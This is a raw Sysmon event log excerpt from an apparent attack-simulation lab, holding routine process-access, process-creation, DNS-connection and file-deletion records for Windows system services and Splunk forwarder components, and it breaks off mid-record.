14:20:47.705{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044662Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:47.705{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044661Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:47.705{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044660Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:47.705{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044659Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:47.705{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044658Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:47.705{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044657Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:47.705{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044656Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:47.705{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044655Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:47.705{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044654Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:47.705{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-18BF-629A-2907-000000006002}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044653Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:47.705{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-18BF-629A-2907-000000006002}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044652Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:47.706{0A5DF930-18BF-629A-2907-000000006002}3244C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044651Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:47.299{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22248B59270303BE0C563984026FA2CA,SHA256=43FF1F84B4BFFCFA9D969EAC261587B1F36B71BB221C0D142B630025E1277F35,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:45.026{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-57526-true2001:7fd:0:0:0:0:0:1-53domain 354300x8000000000000000205892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:45.026{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65137- 23542300x8000000000000000205891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:47.066{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=98052C56FEDC7002F6FDC113B37E3840,SHA256=B1FC8BA94A0C3ACD49C1D2696A16A8831385D3FC1EE64B9AFA2B829D6652E3E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044693Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-18C0-629A-2B07-000000006002}2784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044692Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044691Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044690Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044689Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044688Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044687Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044686Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044685Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044684Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044683Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E35B-6299-0500-000000006002}412428C:\Windows\system32\csrss.exe{0A5DF930-18C0-629A-2B07-000000006002}2784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044682Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.846{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-18C0-629A-2B07-000000006002}2784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044681Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:48.848{0A5DF930-18C0-629A-2B07-000000006002}2784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 